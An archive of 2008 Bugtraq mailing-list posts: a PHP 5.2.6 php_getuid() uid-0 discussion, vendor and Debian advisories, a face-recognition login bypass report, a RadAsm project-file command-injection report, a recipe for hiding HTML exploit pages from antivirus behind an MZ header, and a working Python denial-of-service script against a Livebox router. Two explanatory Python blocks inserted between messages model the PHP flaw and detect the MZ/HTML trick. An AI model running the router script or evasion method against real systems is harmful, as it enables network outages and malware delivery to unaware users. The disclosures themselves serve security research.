To: Eygene Ryabinkin <rea-sec@codelabs.ru>, bugtraq@securityfocus.com
Subject: Re: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
References: <200812061940.mB6JemE5002856@www5.securityfocus.com> <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A>
In-Reply-To: <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A>
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 7bit
Status:   

Eygene Ryabinkin wrote:
> Maksymilian, good day.

> Sat, Dec 06, 2008 at 12:40:48PM -0700, cxib@securityreason.com wrote:
>> [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
> [...]
>> Using PHP 5.2.6, as a Apache module can bypass many security points.

> Am I right that this vulnerability exists only in the Apache 1.x flavour
> of the PHP module?  The code in question that sets SG(server_context)
> too late and initializes BG variable after the .htaccess processing
> exists only in sapi/apache/mod_php5.c.  For Apache 2.x module the
> handler is 'php_handler', it lives in apache2{filter,handler}/sapi_apache2.c
> and BG/SG(server_context) are initialized before .htaccess processing.

yes

BG(page_uid)=BG(page_gid)=0

should be -1

so

php_getuid() will return 0.

tested on apache 13 20 22


> And to clarify a bit the overall picture: am I right that the purpose of
> your sleep.php manipulations is to make Apache to invoke another "fresh"
> child that will process

yes

> error_log contents with errorneous value of
> uid/gid = 0?  It seems to me that the effect of the found vulnerability
> can be shortly characterized as "the first request for the given Apache
> child will have uid/gid = 0 as the values returned from 'php_getuid()'
> in the code that handles .htaccess contents (to be precise, in the code
> inside the function send_php() before the call to
> apache_php_module_main(), the point where BG is really initialized by
> PHP_RINIT_FUNCTION(basic))".

if (BG(page_uid)==-1 || BG(page_gid)==-1)

will never happen in fresh apache child.

> Am I missing something?


php_getuid() is an abstract function for php.

-- 
Best Regards,
------------------------
pub   1024D/A6986BD6 2008-08-22
uid                  Maksymilian Arciemowicz (cxib)
<cxib@securityreason.com>
sub   4096g/0889FA9A 2008-08-22

http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
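
A model of the initialisation-order issue discussed in the exchange above, added here as an example and not taken from PHP's source: BasicGlobals, first_request_uid and owner_check are constructed names, the request flow is reduced to the facts the thread states (zero-filled globals in a fresh child, a -1 sentinel that php_getuid() checks), and owner_check is an assumed, simplified owner-match check of the kind safe_mode performs, not PHP's exact logic.

```python
"""Model of why php_getuid() yields 0 on a fresh child's first request.

Constructed example; BasicGlobals stands in for PHP's BG struct and the
request flow is reduced to the two facts the thread establishes:
  * a freshly forked child's globals are zero-filled, so page_uid/page_gid
    start at 0 rather than the -1 that PHP_RINIT_FUNCTION(basic) stores;
  * php_getuid() only looks up the script owner when it sees the -1 sentinel.
"""
from dataclasses import dataclass

UNSET = -1  # sentinel that PHP_RINIT_FUNCTION(basic) is meant to store


@dataclass
class BasicGlobals:
    """Stand-in for BG(): zero-filled, like static storage in a new process."""
    page_uid: int = 0
    page_gid: int = 0


def basic_rinit(bg: BasicGlobals) -> None:
    """What RINIT does for these fields: mark them as not yet resolved."""
    bg.page_uid = UNSET
    bg.page_gid = UNSET


def php_getuid_model(bg: BasicGlobals, script_uid: int, script_gid: int) -> int:
    """Mirror of the check quoted in the thread.

    Only when page_uid or page_gid is -1 does it consult the script's
    ownership (script_uid/script_gid stand in for the stat() result).
    Otherwise the cached value is returned as-is, whatever it holds.
    """
    if bg.page_uid == UNSET or bg.page_gid == UNSET:
        bg.page_uid = script_uid
        bg.page_gid = script_gid
    return bg.page_uid


def first_request_uid(rinit_before_htaccess: bool, script_uid: int,
                      script_gid: int = 100) -> int:
    """uid that php_getuid() reports to .htaccess handling on a child's first request.

    rinit_before_htaccess=False is the ordering the thread describes: BG is
    initialised only after .htaccess processing, so the zero-filled globals
    never trip the -1 check and 0 (root) comes back.
    """
    bg = BasicGlobals()
    if rinit_before_htaccess:
        basic_rinit(bg)
    return php_getuid_model(bg, script_uid, script_gid)


def owner_check(page_uid: int, file_owner_uid: int) -> bool:
    """Assumed, simplified owner-match check of the kind safe_mode performs
    (not PHP's exact logic): the script may touch a file only when the
    script owner equals the file owner."""
    return page_uid == file_owner_uid


if __name__ == "__main__":
    buggy = first_request_uid(False, script_uid=1000)
    fixed = first_request_uid(True, script_uid=1000)
    print("uid seen with late RINIT :", buggy)   # 0
    print("uid seen with early RINIT:", fixed)   # 1000
    # A root-owned file wrongly passes the owner check for a uid-1000 script.
    print("root-owned file allowed? ", owner_check(buggy, 0))  # True
```

The defender's takeaway is that a sentinel of 0 coincides with root; a "not yet set" marker must be a value that cannot be a valid id and must be written before the first consumer runs.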

From - Mon Dec  8 12:09:20 2008
Date: Sun, 7 Dec 2008 23:26:16 -0700
Message-Id: <200812080626.mB86QGrN001758@www5.securityfocus.com>
From: xhakerman2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass

********************************************************************************************
Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass
         hackers.
NOTIFICATION:
This exploit is based on Andrey Bayora's "magic of magic byte" but with some development.
This proof of concept was created for educational purposes only. Use the code at your own risk.
The author will not be responsible for any damages.
*********************************************************************************************
Exploit Information:
    Date: 2008/19/08
    Impact: bypassing the detection of a malicious web page that can compromise a user's system
Vulnerable AV software:
        ESET Smart Security latest version. <== The exploit was dedicated to it.
        AhnLab-V3 2008.9.13.0
        AntiVir 7.8.1.28
        AVG 8.0.0.161
        CAT-QuickHeal 9.50
        ClamAV 0.93.1
        DrWeb 4.44.0.09170
        eSafe 7.0.17.0
        eTrust 31.6.6086
        Ewido 4.0
        Fortinet 3.113.0.0
        Ikarus T3.1.1.34.0
        K7AntiVirus 7.10.454
        NOD32v2 3440
        Norman 5.80.02
        Panda 9.0.0.4
        PCTools 4.4.2.0
        Prevx1 V2
        Rising 20.61.42.00
        Sophos 4.33.0
        Sunbelt 3.1.1633.1
        Symantec 10
        TheHacker 6.3.0.9.081
        TrendMicro 8.700.0.1004
        VBA32 3.12.8.5
        ViRobot 2008.9.12.1375
        VirusBuster 4.5.11.0
The thing that must be considered is that the PoC varies from exploit to exploit (sometimes
Kaspersky and the other famous AV software can be deceived).
Proof Of Concept:
As I said, the exploit is based on the magic of magic byte method: we first add the MZ header to the HTML exploit and change the extension to txt or jpg or no extension. The exploit is compatible with IE6 and IE7 because IE6 and IE7 execute the HTML even if it is in a txt file or a file with no extension.
So the exploit works in cooperation with IE6 and IE7 :).
VirusTotal result of MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2).
http://www.virustotal.com/fr/analisis/062ec3b8d8b88e99865f798cc08b0718
and this is a variant "obfuscated by this method".
http://www.virustotal.com/fr/analisis/7db1bd321a1f945b4abfa73844c36d99
POC:
1-add the MZ header to the HTML file:
MZ [binary DOS stub bytes, not recoverable from the archived message] This program cannot be run in DOS mode.
You can put other EXE info in the HTML body for more deception (shown in the second result).
2-rename the HTML to a file with no extension, or to txt or jpg.
3-upload it to the web server:
    http://localhost/mallpage.txt or http://localhost/mallpage<non extension>.
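
A defender-side check for the mismatch the post above relies on, added here as an example and not code from the post: it reads the magic bytes, tests whether an MZ header is actually followed by a valid PE signature, and looks for HTML markup in files whose extension or magic says they are not HTML. The sample files are constructed inside the block; the post's own files are not reproduced.

```python
"""Flag files that hide HTML markup behind an executable (MZ) header.

Added example (not code from the post). The samples at the bottom are
constructed here. A scanner that trusts only the first bytes sees "MZ"
and files the object as a PE; a browser that sniffs content sees HTML.
Checking both views, and whether the PE header is even valid, exposes
the disagreement.
"""
import os
import re
import struct

HTML_MARKUP = re.compile(rb"<\s*(?:html|head|body|script|object|iframe|embed)\b",
                         re.IGNORECASE)
# Extensions a sniffing browser may still render as HTML (the post names txt,
# jpg and no extension).
NON_HTML_EXTS = {"", ".txt", ".jpg", ".jpeg", ".gif", ".png"}


def magic_type(data: bytes) -> str:
    """Coarse type from the leading bytes only, as a naive scanner would see it."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if data.startswith(b"GIF8"):
        return "gif"
    return "unknown"


def is_plausible_pe(data: bytes) -> bool:
    """True only if e_lfanew (offset 0x3c) points at a 'PE\\0\\0' signature.

    A bare DOS stub pasted in front of HTML carries the MZ magic but no
    such signature, so it fails this check.
    """
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(filename: str, data: bytes) -> dict:
    """Combine extension, magic and content views; any disagreement is suspicious."""
    ext = os.path.splitext(filename)[1].lower()
    magic = magic_type(data)
    has_html = HTML_MARKUP.search(data) is not None
    reasons = []
    if magic == "pe" and not is_plausible_pe(data):
        reasons.append("MZ magic without a valid PE header")
    if magic == "pe" and has_html:
        reasons.append("HTML markup behind an MZ header")
    if has_html and ext in NON_HTML_EXTS:
        reasons.append(f"HTML markup in a {ext or 'no-extension'} file")
    return {"ext": ext, "magic": magic, "html": has_html,
            "verdict": "suspicious" if reasons else "ok", "reasons": reasons}


def _minimal_pe() -> bytes:
    """Constructed 68-byte stand-in for a genuine PE: MZ, e_lfanew=0x40, 'PE\\0\\0'."""
    return b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00"


# Constructed samples, not the files referenced in the post.
SAMPLES = {
    "page.html": b"<html><body>hello</body></html>",
    "tool.exe": _minimal_pe(),
    # The post's trick: DOS stub text, then the HTML, served as .txt.
    "mallpage.txt": (b"MZ" + b"\x00" * 62
                     + b"This program cannot be run in DOS mode.\r\n"
                     + b"<html><body><script>alert(1)</script></body></html>"),
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"<script>alert(1)</script>",
}


def scan_samples() -> dict:
    """Verdict per sample name."""
    return {name: classify(name, data)["verdict"] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        r = classify(name, data)
        print(f"{name:14} magic={r['magic']:7} html={r['html']!s:5} {r['verdict']}",
              "; ".join(r["reasons"]))
```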

From - Mon Dec  8 12:19:20 2008
Date: Mon, 8 Dec 2008 16:47:36 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: Maksymilian Arciemowicz <cxib@securityreason.com>
Cc: bugtraq@securityfocus.com
Subject: Re: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
Message-ID: <REgd3r0TFgmK/BeL3kQXz4zNIX0@kjaK+/sQ5DW5981v71UogZJPf/0>
References: <200812061940.mB6JemE5002856@www5.securityfocus.com> <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A> <493D1DBC.4060400@securityreason.com>
In-Reply-To: <493D1DBC.4060400@securityreason.com>

Maksymilian,

Mon, Dec 08, 2008 at 02:14:36PM +0100, Maksymilian Arciemowicz wrote:
> > Sat, Dec 06, 2008 at 12:40:48PM -0700, cxib@securityreason.com wrote:
> >> [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
> > [...]
> >> Using PHP 5.2.6, as a Apache module can bypass many security points.
> > 
> > Am I right that this vulnerability exists only in the Apache 1.x flavour
> > of the PHP module?  The code in question that sets SG(server_context)
> > too late and initializes BG variable after the .htaccess processing
> > exists only in sapi/apache/mod_php5.c.  For Apache 2.x module the
> > handler is 'php_handler', it lives in apache2{filter,handler}/sapi_apache2.c
> > and BG/SG(server_context) are initialized before .htaccess processing.

> yes

> BG(page_uid)=BG(page_gid)=0

> should be -1

> so

> php_getuid() will return 0.

> tested on apache 13 20 22

Yes, sorry: I missed the 'AllowOverride All' for my 2.2 testbed.

Once again, sorry for the confusion: the issue is here for 2.x too.
-- 
Eygene

From - Mon Dec  8 12:19:20 2008
Message-ID: <F3C3C459039F462D92A8E46CEB461442@minhbqPC>
From: "SVRT-Bkis" <svrt@bkav.com.vn>
To: <bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>
Subject: [SVRT-07-08] Vulnerability in Face Recognition Authentication Mechanism of Lenovo-Asus-Toshiba Laptops
Date: Mon, 8 Dec 2008 11:39:48 +0700

VULNERABILITY IN FACE RECOGNITION AUTHENTICATION MECHANISM
                               LENOVO-ASUS-TOSHIBA LAPTOPS

1. General Information

The face recognition feature is provided by Asus, Lenovo and Toshiba as 
specialized software shipped together with their laptops. It is embedded 
in all laptop families that have webcams and support the Windows Vista and 
XP operating systems. Owners of laptops with this technology do not have 
to type in a password or use a fingerprint; they simply sit in front of 
the laptop to log in.

Face recognition is introduced by these vendors as a remarkable feature 
that helps prevent unauthorized people from breaking into laptops and 
ensures information security for their owners.

Details : http://security.bkis.vn/?p)2
SVRT Advisory : SVRT-07-08
Initial vendor notification :  20-11-2008
Release Date : 08-12-2008
Update Date : 08-12-2008
Discovered by : SVRT-Bkis
Attack Type : Authentication Mechanism Bypass
Security Rating : Critical
Impact : Loss of Confidentiality and Integrity
Affected Software : Lenovo Veriface III (prior versions are vulnerable)
                    Asus SmartLogon V1.0.0006 (prior versions are vulnerable)
                    Toshiba Face Recognition 2.0.2.32 (prior versions are vulnerable)

Video demo: 
http://security.bkis.vn/Proof-of-concept/Face_Recognition/FaceRecognitionBypassing_DemoVideo.wmv

2. Technical Description

After 4 months of research on face recognition technology as applied to 
laptops, Bkis (Vietnam) has concluded that the user authentication 
mechanisms based on face recognition from Asus, Lenovo and Toshiba do not 
meet security needs.

Bkis research shows that the face-recognition-based authentication 
mechanisms of these 3 laptop vendors can all be bypassed, even when set 
to the highest security level.

To use this technology, a laptop's owner uses the webcam to capture his 
or her face at close range and from different viewpoints. This step lets 
the laptop "remember" the owner's facial characteristics and store them 
in the face database. Bkis's research, however, shows that an unauthorized 
person can easily regenerate a suite of fake face data to bypass the 
authentication mechanism.

In tests on laptops with 1.3 megapixel cameras produced by Lenovo, Asus 
and Toshiba, using the bypass model above with special photos or videos 
of some users, we were able to pass face-recognition user authentication 
and log into user accounts on Windows Vista without difficulty.

All the applications tested are of their latest versions and are set to 
Highest Security Level.
- Lenovo Veriface III
- Asus SmartLogon V1.0.0005
- Toshiba Face Recognition 2.0.2.32

3. Solution

While waiting for this vulnerability to be fixed, Bkis recommends that 
users all over the world stop using face authentication to log in to 
their laptops.

Credit
Thanks Le Nhat Minh, Nguyen Minh Duc, Bui Quang Minh, Le Minh Hung.

----------------------------------------------------------------
Security Vulnerability Research Team (SVRT-Bkis)

Bach Khoa Internetwork Security Center (Bkis)
Hanoi University of Technology (Vietnam)

Office: 5th Floor, Hitech building - 1A Dai Co Viet, Hanoi, Vietnam
Tel: 84.4.38 68 47 57 Ext 128
Mobile: +84 983 60 99 20
Email: svrt@bkav.com.vn
Website: www.bkav.com.vn
----------------------------------------------------------------  


From - Mon Dec  8 14:59:22 2008
Message-ID: <92302a090812080807j5942eaecm175ea42e78bebcb@mail.gmail.com>
Date: Tue, 9 Dec 2008 00:07:57 +0800
From: "Li Gen" <superligen@gmail.com>
To: bugtraq@securityfocus.com
Subject: Re: RadAsm <=2.2.1.5 Local Command Execution
Cc: xhakerman2006@yahoo.com
In-Reply-To: <20081208055445.20160.qmail@securityfocus.com>
References: <20081208055445.20160.qmail@securityfocus.com>

Hi,
    I don't think this is a vulnerability. If this is a vulnerability,
Makefile is also a vulnerability. Do you think so?
   Regards


2008/12/8 <xhakerman2006@yahoo.com>
>
> ------------------------------------------------------------------
> vulnerability discovered by DATA_SNIPER.
> bug discovered on 25/11/2008.
> infected version:All Version
> greetz go to:www.at4re.com(Arab Team 4 Reverse Engineering),arab4services.net
> Critical: Highly critical
> Impact:Command Execution
> ------------------------------------------------------------------
> this is a little PoC that can execute an arbitrary command on the victim machine.
> in an unexpected way the attacker can put a command in the project file (".rap" file) instead of the linker path or the Macro Assembler "ML.exe" path.
> the project file looks like this.
> " some data has been cut to make it readable"
> -------------------------------------
> project file structure
> [Project]
> Assembler=masm
> Type=Win32 App
> ......datat
> [Files]
> 1=file.Asm
> .....data
> [MakeFiles]
> 5=CRC Check.exe
> [MakeDef]
> Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
> 1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
> 2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2  <==Command Execution by replacing the original file path with the command
> 3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
> 4=0,0,,5
> 5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
> 7=0,0,"$E\OllyDbg",5
> 6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
> 11=4,O,$B\RC.EXE /v,1   <==Command Execution by replacing the original file path with the command
> 12=3,O,$B\ML.EXE /c /coff /Cp /Zi /nologo /I"$I",2   <==Command Execution by replacing the original file path with the command
> 13=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /DEBUG /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
> data.....
> [Resource]
> data.....and more data.
> ----------------------------------------------------------------------
> as you see, " <==Command Execution by replacing the original file name with the command" means that this type of data in the project can be exploited for command execution by malicious people.
> and when the user tries to compile the project, he will face the issue of a bad command executing on his operating system.

From - Mon Dec  8 15:09:20 2008
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02391 SSRT071481 rev.1 - HP OpenView Reporter and HP Reporter Running on Windows, Remote Denial of Service (DoS)
Date: Mon, 08 Dec 2008 11:23:19 -0800
Message-Id: <20081208192319.CFC00BD83@hpchs.cup.hp.com>

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01612418
Version: 1

HPSBMA02391 SSRT071481 rev.1 - HP OpenView Reporter and HP Reporter Running on Windows, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-12-08
Last Updated: 2008-12-08

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Reporter and HP Reporter running on Windows. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2007-4349

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Reporter v3.7, HP Reporter v3.8 running on Windows

BACKGROUND

CVSS 2.0 Base Metrics
==============================================
Reference         Base Vector                     Base Score
CVE-2007-4349     (AV:N/AC:M/Au:N/C:N/I:N/A:P)    4.3
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP OpenView Reporter v3.7 

HP has provided a hotfix to resolve this vulnerability for HP OpenView Reporter v3.7. Please contact the normal HP Services support channel and request the LCore - XPL Hotfix: "Trace Service crashes due to improper handling of Trace Event Message."

HP Reporter v3.8 

HP has provided a hotfix to resolve this vulnerability for HP Reporter v3.8. Please contact the normal HP Services support channel and request the LCore - XPL Hotfix: "Hotfix XPL 6.0."

PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 8 December 2008 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

© Copyright 2008 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

From - Mon Dec  8 15:19:20 2008
Date: Mon, 8 Dec 2008 12:12:51 -0700
Message-Id: <200812081912.mB8JCp8d030115@www5.securityfocus.com>
From: 0in.email@gmail.com
To: bugtraq@securityfocus.com
Subject: Neostrada Livebox Remote Network Down PoC Exploit

# Neostrada Livebox Router Remote Network Down PoC Exploit
# Author: 0in aka zer0in from Dark-Coders Group!
# Contact: 0in.email(at)gmail.com / 0in(at)dark-coders.pl
# Site: http://dark-coders.pl
# Greetings to: All Dark-Coders Members: die,doctor,m4r1usz,sun8hclf ;*
#               Friends: cOndemned,joker,chomzee,TBH
#               IRC: #dark-coders & #pvt
# Description:
#       When we send a "specially crafted http packet" x ~25
#       Livebox HTTP service && all network goes down
# Simple PoC source:
#!/usr/bin/python

from socket import *
import os
import sys
target = "192.168.1.1"
def to_vuln(ip):
        suck = socket(AF_INET,SOCK_STREAM,0)
        try:
                conn = suck.connect((ip,80))
        except Exception:
                check(ip)
        return suck
def check(ip):
        print "[+] No HTTP response..."
        print "[+] Server and network should go down!"
        print "[+] Check it with ping..."
        os.system("ping "+ip)
i=0
print "[!] Neostrada Livebox Remote Network Down Exploit!!"
print "[!]              [HTTP DoS vuln]           "
print "[!]      by 0in [0in.email(at)gmail.com]           "
print "\n[+] Dosing..."
for i in range(256):
        pack3t = "GET /- HTTP/1.1\r\n\r\n"
        POC = to_vuln(target)
        POC.send(pack3t)
        try:
                POC.recv(512)
        except Exception:
                check(target)

From - Mon Dec  8 15:29:20 2008
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 08 Dec 2008 19:58:30 +0100
Message-ID: <87ej0i4hpl.fsf@mid.deneb.enyo.de>
Subject: [SECURITY] [DSA 1683-1] New streamripper packages fix potential code execution
Priority: urgent
To: bugtraq@securityfocus.com
Resent-Date: Mon,  8 Dec 2008 18:58:40 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1683-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
December 08, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : streamripper
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-4337 CVE-2008-4829
Debian Bug     : 506377

Multiple buffer overflows involving HTTP header and playlist parsing
have been discovered in streamripper (CVE-2007-4337, CVE-2008-4829).

For the stable distribution (etch), these problems have been fixed in
version 1.61.27-1+etch1.

For the unstable distribution (sid) and the testing distribution
(lenny), these problems have been fixed in version 1.63.5-2.

We recommend that you upgrade your streamripper package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27.orig.tar.gz
    Size/MD5 checksum:   294218 8761dda030f92cbdfa38e73a981cc6bc
  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1.diff.gz
    Size/MD5 checksum:     5040 0a4fe994a155d07163b3455df5c2668b
  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1.dsc
    Size/MD5 checksum:      964 67ddf22de3c0642e41245e07e534c992

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_alpha.deb
    Size/MD5 checksum:    84142 9450efa0b7fcfce8e976a0a1acb9e837

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_amd64.deb
    Size/MD5 checksum:    75808 0d0d435b05e1c7b5bf2aa375b6569ae4

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_arm.deb
    Size/MD5 checksum:    70992 3d77dcfe3d7785aaed4544cdfd3a8489

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_hppa.deb
    Size/MD5 checksum:    77884 aff00b60cc13c3c46232f86a1bfab553

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_i386.deb
    Size/MD5 checksum:    71180 61c43e7298aac28f4e96287e7eb8b1b0

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_ia64.deb
    Size/MD5 checksum:    99678 b18634cd32a198e747aa99470d3863ab

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_mips.deb
    Size/MD5 checksum:    78584 a417879681280d7f4640557cf1b6085a

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_mipsel.deb
    Size/MD5 checksum:    78814 c92e229fc90db4cf408ee44a619545ee

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_powerpc.deb
    Size/MD5 checksum:    76114 45d0eaaea3a1ec5d874aa9f51221d89c

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_s390.deb
    Size/MD5 checksum:    75984 7aaff15041ece4095eaa1ab470aed7b6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_sparc.deb
    Size/MD5 checksum:    70322 78e266c09b92286776216406420f1220


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJPW3fAAoJEL97/wQC1SS+xaIH/RD5w1SisDVPgeQ412g0TXVA
wx1/cUqmJ2ZR7ShBryz/IPsBRrjzsyfdqd7kWKTofJow+pdFgJDzEPFtPo9w7Db+
RVHSktWqc5qraUnIFW7qwH55TjTrPVFoUOL7uBbsJVdVHNH06tRvPpeQ4SRjdKvO
jDms08jk4pcU/Uz2yBfQJ45Ql5TXedVE0E60CkEzOYmzabM/YfJkSO+yH2SfAl6g
JYguCSe6O2HDQFkEXbKwGsWnZTdg5V2xrTZraU/XZMZc6QvefAv4djc7iM3nwtsi
VNR2cKYpqVF5g+FeSPZtajG3uqZwuCWNmE4TzmjF4vnt59Wq8GmpX/5hpoALC/M=gyJj
-----END PGP SIGNATURE-----

From - Mon Dec  8 15:39:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f16
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38858-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 45595ECD5D
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:31:41 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A30B11437F4; Mon,  8 Dec 2008 11:57:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
